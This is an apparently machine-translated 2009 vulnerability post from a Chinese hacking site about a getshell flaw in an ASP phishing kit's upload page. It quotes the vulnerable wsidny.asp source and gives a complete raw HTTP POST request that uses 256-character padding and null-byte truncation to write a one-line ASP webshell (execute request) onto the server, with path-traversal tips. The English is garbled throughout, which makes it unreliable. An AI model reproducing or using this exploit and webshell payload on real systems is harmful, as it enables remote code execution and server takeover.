Flower horse Inbox sub-Getshell 0day-vulnerability warning-the black bar safety net

2009-10-31T00:00:00
ID MYHACK58:62200925153
Type myhack58
Reporter 佚名
Modified 2009-10-31T00:00:00

Description

Features:the login. asp can look to copyright,but some boxes put in this address change request. In addition to the main directory there is a wsidny. asp Set the program to filter what ash very closely,see To is a professional people to write,only can take place in this wsidny. asp Look at the code: <!-- #include file="conn. asp" - > <% Server. ScriptTimeout = 3 6 0 0 0 PostSize = Request. TotalBytes if postsize=0 then response. End() end if BytesRead = 0 ReadSize=2 5 6 HeadSize=2 5 6 filename = Request. BinaryRead(ReadSize) BytesRead = BytesRead + ReadSize PostData = Request. BinaryRead(PostSize - BytesRead) StoreFile(filename) Function Bytes2bStr(vin) if lenb(vin) =0 then Bytes2bStr = "" exit function end if Dim BytesStream,StringReturn set BytesStream = Server. CreateObject("ADODB. Stream") BytesStream. Type = 2 BytesStream. Open BytesStream. WriteText vin BytesStream. Position = 0 BytesStream. Charset = "gb2312" BytesStream. Position = 2 StringReturn = BytesStream. ReadText BytesStream. close set BytesStream = Nothing Bytes2bStr = StringReturn End Function Function StoreFile(filename) filea=Bytes2bStr(filename) filea=LCase(filea) if instr(filea,".")& gt;0 then fileb=split(filea,".") num2=ubound(fileb) if instr("jpg|gif|jpeg|png|bmp",fileb(num2))>0 then filea=filea else filea=filea&". gif" end if else filea=filea&". gif" end if Path=server. MapPath(imgFolder&filea) Set oFileStream = CreateObject ("ADODB. Stream") oFileStream. Type = 1 oFileStream. Mode = 3 oFileStream. Open oFileStream. Write(PostData) oFileStream. SaveToFile Path,2 oFileStream. Close Set oFileStream = Nothing End Function Response. Write PostSize Response. Write " bytes were read." %>don't understand this page is used to doing,may be generated a picture of the broken key... A start is to think locally constructed form directly submit,upload with;a picture of a horse,the results because it is a Request. BinaryRead takes in data,so the urlencode of parameters are not taken out. Instead of vbs contract. Here again there is a problem,because the path is taken prior to 2 5 6 characters,over the back of the server. MapPath the maximum supported length,so think of a use\0 0 truncated,the vbs send http request caught out,with ue write truncate,and then submit,remove the include file test is successful. However, the belt contains the error message. Because the front of the conn. the asp contains a fsql. asp anti-note page,check the request. form,called a request. form after you can not call Request. BinaryRead. otherwise it will error. That this page what is the significance? Here tangled for a long time,try to remove the http header Content-Type: application/x-www-form-urlencoded,submit,that turned out successful upload birds,which only to find himself had previously been SB. To remove this header,iis will think that there is no form format to submit the parameters,thus with the request. form won't receive any data,it will not talk to the back of the Request. BinaryRead conflict. The following made using the method: POST /DNFZONX/wsidny. asp HTTP/1.1 Accept-Language: zh-cn Content-Length: 2 8 4 Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/vnd. ms-powerpoint, application/vnd. ms-excel, application/msword, / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: xxx.fuck.com Connection: Keep-Alive a. asp aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<%execute request("value")%> The word code in front to be constructed to 2 5 6 characters,then the ue inside the spaces with\0 0 instead,change the host header or something,NC, submitted,see the return xxx bytes were read. Then,on success,the target folder under img/a. asp is,if image directory not found or not executable or something,you can use a../or something jumping out just fine,just make sure the word front is just a 2 5 6 characters. The local test is successful,we encountered a box of envelopes or something,straining of the day!